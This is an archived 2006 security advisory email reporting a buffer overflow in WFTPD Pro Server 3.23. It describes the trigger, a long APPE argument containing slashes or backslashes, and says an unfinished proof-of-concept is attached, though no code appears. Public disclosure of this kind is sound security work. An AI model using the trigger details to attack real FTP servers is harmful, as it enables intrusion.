The OpenNET Project
 
Date: Tue, 7 Nov 2006 10:26:29 +0100 (CET)
From: Joxean Koret <joxeankoret@yahoo.es.>
Subject: WFTPD Pro Server 3.23 Buffer Overflow
To: [email protected], [email protected]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1539039305-1162891589=:29996"
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: antivirus-gw at tyumen.ru

--0-1539039305-1162891589=:29996
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Content-Id: 
Content-Disposition: inline

WFTPD Pro Server 3.23 Buffer Overflow

A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwriting EIP
is quite easy but I'm too lazy...

Attached goes an (unfinished) POC.

Disclaimer

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------

Contact
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


                
--0-1539039305-1162891589=:29996
Content-Type: application/octet-stream; name="bof.py"
Content-Transfer-Encoding: base64
Content-Description: 846879707-bof.py
Content-Disposition: attachment; filename="bof.py"
--0-1539039305-1162891589=:29996--

